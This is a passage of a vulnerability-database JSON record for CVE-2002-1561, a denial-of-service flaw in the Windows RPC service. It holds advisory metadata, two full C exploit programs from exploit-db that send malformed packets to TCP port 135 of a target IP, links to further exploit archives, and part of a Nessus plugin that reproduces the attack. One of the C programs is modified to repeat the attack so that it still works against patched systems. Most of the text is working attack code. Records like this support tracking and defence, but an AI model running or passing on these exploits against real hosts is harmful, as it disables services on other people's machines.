<http://www.securityfocus.com/bid/6769>\n * <http://www.securityfocus.com/archive/1/296114>\n * <http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>\n * <http://support.microsoft.com/default.aspx?scid=kb;en-us;331953>\n * <http://support.microsoft.com/?kbid=814119>\n * <http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/how_rpc_works.asp>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Dave Aitel of Immunity Security.\n\nThis document was written by Art A Manion.\n\n### Other Information\n\n**CVE IDs:** | 
[CVE-2002-1561](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1561>) \n---|--- \n**Severity Metric:** | 23.69 \n**Date Public:** | 2002-10-18 \n**Date First Published:** | 2003-03-26 \n**Date Last Updated: ** | 2003-06-04 18:13 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-06-04T18:13:00", "published": "2003-03-26T00:00:00", "id": "VU:261537", "href": "https://www.kb.cert.org/vuls/id/261537", "type": "cert", "title": "Microsoft Windows RPC service vulnerable to DoS via NULL pointer dereference", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:38:12", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1). CVE-2002-1561. Dos exploit for windows platform", "published": "2002-10-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-22T00:00:00", "id": "EDB-ID:21951", "href": "https://www.exploit-db.com/exploits/21951/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n\r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n\r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n\r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n\r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. 
\r\n\r\n/*\r\n************************************************************************\r\n* MS WIN RPC DoS CODE FROM SPIKE v2.7\r\n* \r\n* Compile it use:\r\n* cl winnuke.c\r\n*\r\n* Usage:\r\n* winnuke targetip \r\n*\r\n* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com\r\n* 2002/10/22\r\n************************************************************************\r\n*/\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar sendcode1[] = \r\n\t\"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n\t\"\\xd0\\x16\\xd0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\"\r\n\t\"\\x02\\x00\\x02\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n\t\"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x01\\x10\\x00\\x00\\x00\"\r\n\t\"\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\\x20\\x27\\x01\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\xf0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x00\\x00\\x00\";\r\n\r\nchar sendcode2[] = \r\n\t\"\\x88\\x13\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x13\\x00\\x00\";\r\n\r\nchar sendcode3[] = \r\n\t\"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\";\r\n\r\nchar sendcode4[] = \r\n\t\"\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\xff\\x00\\x00\\x3d\\x3d\\x3d\\x3d\" \r\n\t\"\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\"\r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x50\\x10\\x01\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode5[] = \r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x80\\xf9\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode6[] = 
\r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\xb0\\xe2\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode7[] = \r\n\t\"\\x05\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x60\\x15\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x60\\x15\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode8[] = \r\n\t\"\\x00\\x00\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tWSADATA wsaData;\r\n\tWORD wVersionRequested;\r\n\tstruct hostent \t\t*pTarget;\r\n\tstruct sockaddr_in \tsock;\r\n\tchar *targetip;\r\n\tint port,bufsize;\r\n\tSOCKET s;\r\n\tchar buffer[20480];\r\n\r\n\tprintf(\"========================= HUC Win2000/XP RPC Nuke V0.10 =======================\\r\\n\");\r\n\tprintf(\"================= By Lion, Welcome to http://www.cnhonker.com =================\\r\\n\\n\");\r\n\r\n\tif (argc < 2)\r\n\t{\r\n\t\tprintf(\"Usage:\\r\\n\");\r\n\t\tprintf(\" %s <TargetIP> [TargetPort]\\r\\n\", argv[0]);\r\n\t\tprintf(\"Example:\\r\\n\");\r\n\t\tprintf(\" %s 192.168.0.1\\r\\n\", argv[0]);\r\n\t\tprintf(\" %s 192.168.0.1 135\\r\\n\", argv[0]);\r\n\t\tprintf(\"PS:\\r\\n\");\r\n\t\tprintf(\" If target is XP, try 2 times.\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\twVersionRequested = MAKEWORD(1, 1);\r\n\tif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n\ttargetip = argv[1];\r\n\tport = 135;\r\n\tif (argc >= 3) port = atoi(argv[2]);\r\n\tbufsize = 512;\r\n\tif (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\n\ts = socket(AF_INET, SOCK_STREAM, 0);\r\n\tif(s==INVALID_SOCKET)\r\n\t{\t\r\n\t\tprintf(\"Socket error!\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"Resolving Hostnames...\\n\");\r\n\tif ((pTarget = gethostbyname(targetip)) == NULL)\r\n\t{\r\n\t\tprintf(\"Resolve of %s failed, please try again.\\n\", argv[1]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n\tsock.sin_family = AF_INET;\r\n\tsock.sin_port = 
htons((USHORT)port);\r\n\r\n\tprintf(\"Connecting...\\n\");\r\n\tif ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))\r\n\t{\r\n\t\tprintf(\"Couldn't connect to host.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"Connected!...\\n\");\r\n\tprintf(\"Sending Packets...\\n\");\r\n\tif (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)\r\n\t{\r\n\t\tprintf(\"Error sending nuke Packets\\r\\n\");\r\n\t\tclosesocket(s);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&buffer, '\\x41', 240);\r\n\tsend(s, buffer, 240, 0);\r\n\r\n\tsend(s, sendcode2, sizeof(sendcode2)-1, 0);\r\n\tmemset(&buffer, '\\x42', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode3, sizeof(sendcode3)-1, 0);\r\n\tmemset(&buffer, '\\x43', 512);\r\n\tsend(s, buffer, 512, 0);\r\n\t\r\n\tsend(s, sendcode4, sizeof(sendcode4)-1, 0);\r\n//\tmemset(&buffer, '\\x44', 20480);\r\n//\tsend(s, buffer, 20480, 0);\r\n\r\n//\t/*\r\n\tmemset(&buffer, '\\x44', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode5, sizeof(sendcode5)-1, 0);\r\n\tmemset(&buffer, '\\x45', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode6, sizeof(sendcode6)-1, 0);\r\n\tmemset(&buffer, '\\x46', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode7, sizeof(sendcode7)-1, 0);\r\n\tmemset(&buffer, '\\x47', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode8, sizeof(sendcode8)-1, 0);\r\n\tmemset(&buffer, '\\x48', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\t\r\n//\t*/ \r\n\tprintf(\"Nuked! \\r\\nIf target is XP, try a again! :)\\r\\n\");\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21951/"}, {"lastseen": "2016-02-02T17:38:20", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2). CVE-2002-1561. 
Dos exploit for windows platform", "published": "2002-10-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-22T00:00:00", "id": "EDB-ID:21952", "href": "https://www.exploit-db.com/exploits/21952/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. \r\n\r\n/*\r\n* Microsoft Windows NT RPC Service Denial of Service Vulnerability\r\n*\r\n* Orginal Code By Lion @ http://www.cnhonker.com\r\n* Upgraded By Trancer @ http://BinaryVision.tech.nu\r\n*\r\n* I have notice that even after a Windows NT system is patched aginst this\r\nvulnerability with an offical M$ update,\r\n* an attacker can still DoS that system if he activate this exploit a lot\r\nof times, fast.\r\n* So I've upgraded the exploit by looping it and letting you control the\r\ntimes you want to nuke a system\r\n* (with a patched 2000\\XP 250-400 times is recommended).\r\n*\r\n* That's it. 
enjoy :-)\r\n\\*\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar sendcode1[] =\r\n \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n \"\\xd0\\x16\\xd0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n \"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\"\r\n \"\\x02\\x00\\x02\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x01\\x10\\x00\\x00\\x00\"\r\n \"\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\\x20\\x27\\x01\\x00\\x00\\x00\\x02\\x00\"\r\n \"\\xf0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x00\\x00\\x00\";\r\n\r\nchar sendcode2[] =\r\n \"\\x88\\x13\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x13\\x00\\x00\";\r\n\r\nchar sendcode3[] =\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\";\r\n\r\nchar sendcode4[] =\r\n \"\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\xff\\x00\\x00\\x3d\\x3d\\x3d\\x3d\"\r\n \"\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\"\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x50\\x10\\x01\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode5[] =\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x80\\xf9\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode6[] =\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\xb0\\xe2\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode7[] =\r\n \"\\x05\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x60\\x15\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x60\\x15\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode8[] =\r\n \"\\x00\\x00\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\";\r\n\r\nint 
main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData;\r\n WORD wVersionRequested;\r\n struct hostent *pTarget;\r\n struct sockaddr_in sock;\r\n char *targetip;\r\n int port,bufsize,times,i;\r\n SOCKET s;\r\n char buffer[20480];\r\n\r\n printf(\"======================= Windows NT Multi RPC Nuke V0.12\r\n======================\\r\\n\");\r\n printf(\"=============== Orginal Code By Lion @ http://www.cnhonker.com\r\n===============\\r\\n\");\r\n printf(\"============= Upgraded By Trancer @ http://BinaryVision.tech.nu\r\n==============\\r\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"Usage:\\r\\n\");\r\n printf(\" %s <TargetIP> <TargetPort> <BufferSize> <Times>\\r\\n\", argv[0]);\r\n printf(\"Exaple: %s 198.167.0.1 135 512 250\\r\\n\", argv[0]);\r\n printf(\"PS:\\r\\n\");\r\n printf(\" If target is XP, try 2 times.\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n wVersionRequested = MAKEWORD(1, 1);\r\n if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n targetip = argv[1];\r\n port = 135;\r\n if (argc >= 3) port = atoi(argv[2]);\r\n bufsize = 512;\r\n if (argc >= 4) bufsize = atoi(argv[3]);\r\n times = 1;\r\n if (argc >= 5) times = atoi(argv[4]);\r\n\r\n for (i = 0; i < times; i = i + 1)\r\n {\r\n\r\n s = socket(AF_INET, SOCK_STREAM, 0);\r\n if(s==INVALID_SOCKET)\r\n {\r\n printf(\"Socket error!\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Resolving Hostnames...\\n\");\r\n if ((pTarget = gethostbyname(targetip)) == NULL)\r\n {\r\n printf(\"Resolve of %s failed, please try again.\\n\", argv[1]);\r\n exit(1);\r\n }\r\n\r\n memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n sock.sin_family = AF_INET;\r\n sock.sin_port = htons((USHORT)port);\r\n\r\n printf(\"Connecting...\\n\");\r\n if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))\r\n {\r\n printf(\"Couldn't connect to host.\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Connected!...\\n\");\r\n printf(\"Sending Packets...\\n\");\r\n if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == 
-1)\r\n {\r\n printf(\"Error sending nuke Packets\\r\\n\");\r\n closesocket(s);\r\n exit(1);\r\n }\r\n\r\n memset(&buffer, '\\x41', 240);\r\n send(s, buffer, 240, 0);\r\n\r\n send(s, sendcode2, sizeof(sendcode2)-1, 0);\r\n memset(&buffer, '\\x42', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode3, sizeof(sendcode3)-1, 0);\r\n memset(&buffer, '\\x43', 512);\r\n send(s, buffer, 512, 0);\r\n\r\n send(s, sendcode4, sizeof(sendcode4)-1, 0);\r\n memset(&buffer, '\\x44', 20480);\r\n send(s, buffer, 20480, 0);\r\n\r\n memset(&buffer, '\\x44', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode5, sizeof(sendcode5)-1, 0);\r\n memset(&buffer, '\\x45', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode6, sizeof(sendcode6)-1, 0);\r\n memset(&buffer, '\\x46', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode7, sizeof(sendcode7)-1, 0);\r\n memset(&buffer, '\\x47', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode8, sizeof(sendcode8)-1, 0);\r\n memset(&buffer, '\\x48', 5000);\r\n send(s, buffer, 5000, 0);\r\n i = i + 1;\r\n }\r\n\r\n if (times < 2)\r\n {\r\n printf(\"Nuked! If target is XP, try a again! :)\\r\\n\");\r\n }\r\n else\r\n {\r\n printf(\"%s was nuked %s times\\r\\n\", argv[1], argv[4]);\r\n }\r\n\r\n closesocket(s);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21952/"}, {"lastseen": "2016-02-02T17:38:28", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3). CVE-2002-1561. 
Dos exploit for windows platform", "published": "2002-10-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-18T00:00:00", "id": "EDB-ID:21953", "href": "https://www.exploit-db.com/exploits/21953/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21953.tar.gz", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21953/"}, {"lastseen": "2016-02-02T17:38:36", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4). CVE-2002-1561. 
Dos exploit for windows platform", "published": "2002-10-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 4", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-18T00:00:00", "id": "EDB-ID:21954", "href": "https://www.exploit-db.com/exploits/21954/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21954.rar", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21954/"}], "nessus": [{"lastseen": "2021-01-01T03:53:42", "description": "MS Windows RPC service (RPCSS) crashes trying to dereference a NULL\npointer when it receives a certain malformed request. All MS RPC-based\nservices (i.e. 
a large part of MS Windows 2000+) running on the target\nmachine are rendered inoperable.", "edition": 26, "published": "2002-11-21T00:00:00", "title": "MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1561"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MSRPC-SPIKE27.NASL", "href": "https://www.tenable.com/plugins/nessus/11159", "sourceData": "#\n# Test \"Spike 2.7\" MS RPC Services NULL pointer reference DoS\n#\n# Copyright (c) 2002 Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n# Permission to copy, modify, and redistribute this script under\n# the terms of the GNU General Public License is hereby granted.\n#\n# This script is based on an exploit published on BugTraq:\n# Code by lion, Welcomde to HUC Website Http://www.cnhonker.com\n# 2002/10/22\n#\n\n# Changes by Tenable:\n# - Revised plugin title, added 'see also' (6/24/09)\n# - Changed family (6/25/09)\n# - Revised plugin title, changed family again (10/23/09)\n# - Add MSKB script_xref (8/29/17)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11159);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2002-1561\");\n script_bugtraq_id(6005);\n script_xref(name:\"MSFT\", value:\"MS03-010\");\n script_xref(name:\"MSKB\", value:\"331953\");\n\n script_name(english:\"MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check)\");\n script_summary(english:\"Attempts to crash MS RPC service the Spike 2.7-way\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"MS Windows RPC service (RPCSS) crashes trying to dereference a NULL\npointer when it receives a certain malformed request. All MS RPC-based\nservices (i.e. 
a large part of MS Windows 2000+) running on the target\nmachine are rendered inoperable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patch referenced in the Microsoft bulletin.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/11/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Pavel Kankovsky\");\n script_family(english:\"Windows\");\n\n script_dependencie(\"find_service1.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(135);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n#\n# Prepare DCE BIND request\n#\n\nfunction dce_bind()\n{\n local_var req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers;\n\n # Service UUID:\n # B9E79E60-3D52-11CE-AAA1-00006901293F\n # (this is one of the services bound to port 135)\n sv_uuid = raw_string(\n 0x60, 0x9E, 0xE7, 0xB9, 0x52, 0x3D, 0xCE, 0x11,\n 0xAA, 0xA1, 0x00, 0x00, 0x69, 0x01, 0x29, 0x3F);\n # The version is incorrect \"for extra fun\" (should be 0.2)\n sv_vers = raw_string(0x02, 0x00, 0x02, 0x00);\n\n # Transfer syntar UUID:\n 
# 8A885D04-1CEB-11C9-9FE8-08002B104860\n ts_uuid = raw_string(\n 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11,\n 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);\n ts_vers = raw_string(0x02, 0x00, 0x00, 0x00);\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x0b, 0x03, # BINDPACKET, flags (1st+last frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0x48, 0x00, # fragment length (72)\n 0x00, 0x00, # auth length\n 0x02, 0x00, 0x00, 0x00, # call id\n 0xd0, 0x16, 0xd0, 0x16, # max xmit frag, max recv frag\n 0x00, 0x00, 0x00, 0x00, # assoc group\n 0x01, # num ctx items\n 0x00, 0x00, 0x00, # (padding)\n 0x00, 0x00, # p_cont_id\n 0x01, # n_transfer_syn\n 0x00); # (padding)\n\n return (string(\n req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers));\n}\n\n#\n# Prepare evil DCE request I\n#\n\nfunction attack_dce_req_1()\n{\n local_var req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6, req_hdr;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x01, # REQUESTPACKET, flags (1st frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n 0x20, 0x27, 0x01, 0x00, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00, # opnum: 0\n 0xf0, 0x00, 0x00, 0x00, # ?\n 0x00, 0x00, 0x00, 0x00, # ?\n 0x0f, 0x00, 0x00, 0x00); # ?\n\n req_dt1 = crap(data:raw_string(0x41), length:240);\n\n req_dt2 = raw_string(\n 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x88, 0x13, 0x00, 0x00);\n\n req_dt3 = crap(data:raw_string(0x42), length:5000);\n\n req_dt4 = raw_string(\n 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00);\n\n req_dt5 = crap(data:raw_string(0x43), length:512);\n\n req_dt6 = raw_string(\n 0xfe, 0xff, 0x00, 0x00, 0x00, 
